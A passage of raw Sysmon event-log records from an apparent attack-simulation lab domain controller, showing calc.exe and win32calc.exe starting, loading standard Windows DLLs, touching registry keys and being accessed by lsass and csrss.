L32.DLL+84d4 154100x800000000000000057349318Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.259{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe10.0.14393.0 (rs1_release.160715-1616)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationWIN32CALC.EXE"C:\Windows\System32\win32calc.exe" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=B31A19BA38F110838119299B50517073,SHA256=D7B378A4BC4DEAE748462D216D14A20CCB1BAC1D3FFBC67711DB2CC1D8B182B7{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exe"C:\Windows\System32\calc.exe" 10341000x800000000000000057349317Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.269{8B6011A9-888A-6164-7000-00000000F101}34483736C:\Windows\system32\csrss.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057349316Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.269{8B6011A9-5BAB-618E-5DF3-04000000F101}96645564C:\Windows\System32\calc.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+89d2f|C:\Windows\System32\windows.storage.dll+899a5|C:\Windows\System32\windows.storage.dll+89496|C:\Windows\System32\windows.storage.dll+8a908|C:\Windows\System32\windows.storage.dll+892be|C:\Windows\System32\windows.storage.dll+8c0d5|C:\Windows\System32\windows.storage.dll+8c454|C:\Windows\System32\windows.storage.dll+8ba90|C:\Windows\System32\windows.storage.dll+8e30a|C:\Windows\System32\windows.storage.dll+8e0c2|C:\Windows\System32\SHELL32.dll+3f8fd|C:\Windows\System32\SHELL32.dll+3e496|C:\Windows\System32\SHELL32.dll+80201|C:\Windows\System32\SHELL32.dll+6719e|C:\Windows\System32\SHELL32.dll+3d473|C:\Windows\System32\SHELL32.dll+3d33b|C:\Windows\System32\SHELL32.dll+3cc57|C:\Windows\System32\SHELL32.dll+dcb6e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 154100x800000000000000057349315Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.262{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe10.0.14393.0 (rs1_release.160715-1616)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationWIN32CALC.EXE"C:\Windows\System32\win32calc.exe" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=B31A19BA38F110838119299B50517073,SHA256=D7B378A4BC4DEAE748462D216D14A20CCB1BAC1D3FFBC67711DB2CC1D8B182B7{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exe"C:\Windows\System32\calc.exe" 12241200x800000000000000057349314Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.260{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts 12241200x800000000000000057349313Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.258{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts 13241300x800000000000000057349312Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.256{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefixVisited: 13241300x800000000000000057349311Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.256{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefixCookie: 13241300x800000000000000057349310Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.255{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix(Empty) 734700x800000000000000057349309Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.254{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\wininet.dll11.00.14393.4583 (rs1_release.210730-1850)Internet Extensions for Win32Internet ExplorerMicrosoft Corporationwininet.dllMD5=524876363DA8F469C13E0818256B6131,SHA256=DAA85FEAB4553D9A203A85A58C8CB26A2784E0D33226B41AAE98471DAE75C035trueMicrosoft WindowsValid 10341000x800000000000000057349308Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.253{8B6011A9-886B-6164-0B00-00000000F101}6486932C:\Windows\system32\lsass.exe{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349307Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.253{8B6011A9-886B-6164-0B00-00000000F101}6486932C:\Windows\system32\lsass.exe{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057349306Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.252{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000057349305Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.252{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 13241300x800000000000000057349304Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.252{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefixVisited: 13241300x800000000000000057349303Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.252{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefixCookie: 734700x800000000000000057349302Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.251{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\edputil.dll10.0.14393.2608 (rs1_release.181024-1742)EDP utilMicrosoft® Windows® Operating SystemMicrosoft CorporationEDPUTIL.DLLMD5=75AC86B00CE4C64B02B105A55CA35628,SHA256=DB31A2345E3BB8DC79BFB4CC29615E3B8B7638AE80BFEC45FA57852669A592AEtrueMicrosoft WindowsValid 13241300x800000000000000057349301Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:52.251{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix(Empty) 734700x800000000000000057349300Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.250{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\wininet.dll11.00.14393.4583 (rs1_release.210730-1850)Internet Extensions for Win32Internet ExplorerMicrosoft Corporationwininet.dllMD5=524876363DA8F469C13E0818256B6131,SHA256=DAA85FEAB4553D9A203A85A58C8CB26A2784E0D33226B41AAE98471DAE75C035trueMicrosoft WindowsValid 734700x800000000000000057349299Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.248{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValid 10341000x800000000000000057349298Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.247{8B6011A9-886B-6164-0B00-00000000F101}6486932C:\Windows\system32\lsass.exe{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057349297Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.247{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 10341000x800000000000000057349296Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.247{8B6011A9-886B-6164-0B00-00000000F101}6486932C:\Windows\system32\lsass.exe{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057349295Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.246{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057349294Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.246{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000057349293Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.246{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000057349292Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.246{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=E0F286AF345442E267C33880492CED31,SHA256=5C6D66F5A748551999BE1CDE33A3A1FC2E10D1297EF275D232A9FDCC95BEA84BtrueMicrosoft WindowsValid 734700x800000000000000057349291Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.246{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057349290Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.246{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057349289Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.245{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\edputil.dll10.0.14393.2608 (rs1_release.181024-1742)EDP utilMicrosoft® Windows® Operating SystemMicrosoft CorporationEDPUTIL.DLLMD5=75AC86B00CE4C64B02B105A55CA35628,SHA256=DB31A2345E3BB8DC79BFB4CC29615E3B8B7638AE80BFEC45FA57852669A592AEtrueMicrosoft WindowsValid 734700x800000000000000057349288Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.241{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValid 734700x800000000000000057349287Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.238{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057349286Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.238{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057349285Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.237{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057349284Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.237{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057349283Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.237{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=E0F286AF345442E267C33880492CED31,SHA256=5C6D66F5A748551999BE1CDE33A3A1FC2E10D1297EF275D232A9FDCC95BEA84BtrueMicrosoft WindowsValid 12241200x800000000000000057349282Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349281Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.237{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057349280Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.120{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057349279Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.120{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057349278Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.120{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057349277Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.120{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 12241200x800000000000000057349276Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.120{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders 12241200x800000000000000057349275Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.120{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace 734700x800000000000000057349274Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.120{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeC:\Windows\System32\WinTypes.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Base Types DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWinTypes.dllMD5=9F209F29ABFF007F55328BCC36367005,SHA256=7F2CBE9B349062DFD782032D50C335E6C292EC5F509746941982A7161F24ED84trueMicrosoft WindowsValid 734700x800000000000000057349273Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.120{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057349272Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.120{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057349271Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.120{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057349270Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.120{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 12241200x800000000000000057349269Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.120{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders 12241200x800000000000000057349268Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 